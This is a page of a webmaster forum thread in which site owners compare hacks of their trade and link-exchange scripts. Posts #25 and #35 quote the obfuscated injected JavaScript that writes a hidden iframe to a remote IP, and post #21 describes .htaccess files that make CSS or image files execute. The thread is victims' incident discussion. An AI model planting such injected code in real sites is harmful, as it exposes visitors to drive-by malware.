Page 2 of 7 FirstFirst 1234 ... LastLast
Results 21 to 40 of 121

Thread: We need to talk SECURITY!!! NOW!!

  1. #21
    I need help
    Join Date
    Nov 2007
    Posts
    12

    Default

    I got almost the same problem a couple of weeks ago.
    They added an 'include css' file to my template, and the css file were infact some exploit thingy they loaded from my ST folder.

    The way they executed the file, was to place an htaccess file which was set to execute css files, so it took a while to find it as I didn't look for a css file in my source, but the usual javascript or php include tags.

    At another site of mine they also managed to do exactly the same with a jpg file in my st thumbs folder, and a htaccess.

    The ST file scanner did Not find the htaccess in my thumbs folder, so I have suggested they include that function in coming ST releases, so we will see.

    So if you still have problems, or get it in the future remember to check for htaccess files hidden in your folders.

  2. #22
    Baaaahhh
    Join Date
    Dec 2005
    Location
    lost
    Posts
    1,491

    Default

    ftp uploading your templates is faster (and more secure) than doing it via the ST interface.
    so go with it
    Adult-Sponsor-Search.com Advanced Sponsors Search Engine.
    Webmasters, Find the right sponsors for your sites.
    Program Owners, join up!!!

  3. #23
    Just trolling
    Join Date
    May 2007
    Posts
    5

    Default same

    my sites was hacked by the same way as told TS. I changed all passes but I'm also can't find how they did it. I'm checked my computer, checked my server but found nothing.

  4. #24
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
    the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
    pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

    I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here

  5. #25
    I need help
    Join Date
    Oct 2007
    Posts
    16

    Default 203.121.69.9

    Quote Originally Posted by The Professional
    <//script//> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); <//script//>

    I wanna find out who this fucker is and hang him by his balls.....
    <iframe src="http:/ /203.121.69.9/ex/static.php" width=2 height=2 style="display:none"></iframe>

    203.121.69.9 has no reverse. It's a Malaysian IP. Try complaining to abuse @ isp.time.net.my
    The page mentioned in the above iframe code is empty for me (with and without a referer).

    % [whois.apnic.net node-2]
    % Whois data copyright terms http :/ / www .apnic.net/db/dbcopyright.html

    inetnum: 203.121.64.0 - 203.121.127.255
    netname: TIMETELEKOM
    descr: TIME Telecommunications Sdn Bhd
    descr: Kuala Lumpur
    country: MY
    admin-c: AM59-AP
    tech-c: AM59-AP
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    remarks: This object can only be updated by APNIC hostmasters.
    remarks: To update this object, please contact APNIC
    remarks: hostmasters and include your organisation'"'"'s account
    remarks: name in the subject line.
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    mnt-by: APNIC-HM
    mnt-lower: MAINT-MY-TTNET
    mnt-routes: MAINT-MY-TTNET
    changed: hostmaster @ apnic.net 20000510
    changed: hostmaster @ apnic.net 20010712
    status: ALLOCATED PORTABLE
    changed: hm-changed @ apnic.net 20040708
    source: APNIC

    person: Azmy Mohamad Yusof
    nic-hdl: AM59-AP
    e-mail: azmy @ isp.time.net.my
    e-mail: abuse @ isp.time.net.my
    address: TIMEdotNet Bhd
    address: Level 3, Lot 14 Jalan U1/26 Glenmarie HICOM Industrial Park 40000
    address: Shah Alam Selangor Malaysia
    address: [abuse] abuse @ isp.time.net.my
    phone: +6-03-50326131
    fax-no: +6-03-50326204
    country: MY
    changed: azmy @ isp.time.net.my 20030217
    mnt-by: MAINT-MY-TTNET
    source: APNIC
    Sun

  6. #26

    Default

    3 days ago I got exactly same shit on my AG SQL templates files!!! WTF

  7. #27

  8. #28
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    Hosteasier

  9. #29

    Default

    Quote Originally Posted by ]v[aster
    Hosteasier
    Did you get exactly same code?

  10. #30
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    The script code was the same but there was no I frame. Y?

  11. #31

    Default

    Quote Originally Posted by ]v[aster
    The script code was the same but there was no I frame. Y?
    I got exactly same code in templates files of AGS. And I got it in the same day (November 29).
    I have no ST installed.

  12. #32
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    this keeps getting more interestings.... do you have arylia installed?

  13. #33

    Default

    Quote Originally Posted by The Professional
    this keeps getting more interestings.... do you have arylia installed?
    No.
    I hit you up by icq, please answer.

  14. #34
    There are no words EonBlue's Avatar
    Join Date
    Apr 2007
    Location
    Canada
    Posts
    1,526

    Default

    Quote Originally Posted by ]v[aster
    I too have been a victim of this. I did find something suspicious to go with it. Since I discovered this same code in my templates is the same day I also started seeing this in my referring domains : DELBY FILSECLAB.COM FIREWALL
    the following words are actually a link and on both sites it is shown as an extension of my trade script such as :
    pornstarshack.com/cgi-bin/at3/admin/DELBY FILSECLAB.COM FIREWALL

    I deleted the script code I found in my templates but it says I can't chmod any of my /st files now. Any clue on what to do here
    I don't think that the DELBY FILSECLAB.COM thing is anything malicious. It's a Windows firewall program that can block porn sites:

    Code:
    http://filseclab.com/eng/products/guardian.htm

  15. #35
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    <script> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

    I found this in my linkex admin today? soo confused...

    sorry I have been off icq for sometime now... I will sign on later today

  16. #36
    I need help
    Join Date
    Sep 2006
    Posts
    23

    Default

    > The Professional
    What release are you running? There has been an exploit in rel<=20070827

    I suppose the java script is in one of the links, and not inside the <head> tags or anything? If so when was the link added?

    - v0id

  17. #37
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    just for the benefit of the other readers here... and from the details of the conversation I and void had over icq

    I am running the most recent version... and the hack was in the admin index.php of the program... and my linkex output to my pages were left alone

  18. #38
    Traffic Guru
    Join Date
    Sep 2007
    Posts
    250

    Default

    I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.

  19. #39

    Default

    Quote Originally Posted by ]v[aster
    I found out what that firewall thing was after some more investigation. I did however find some interesting stuff when I searched the IP for that on Google. I got a whois for it as well as a Russian forum of some kind where there appears to be more discussion about this code and ip than we are having here. From what I have seen it appears to be related to some kind of virus or something according to a McAfee report.
    What forum? link please

  20. #40
    I like money The Professional's Avatar
    Join Date
    Nov 2006
    Location
    Canada
    Posts
    1,511

    Default

    hacked yet again today.... I seriously dont' know what's going on
    hacked all my main pages directly it seems... I just over wrote them with the template file...

    except now one template file is chmod 777 and I can't change it to 444? WTF?!! digging deeper again today... if I cna't figure this shit out... all my sites are for sale... fuck it

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •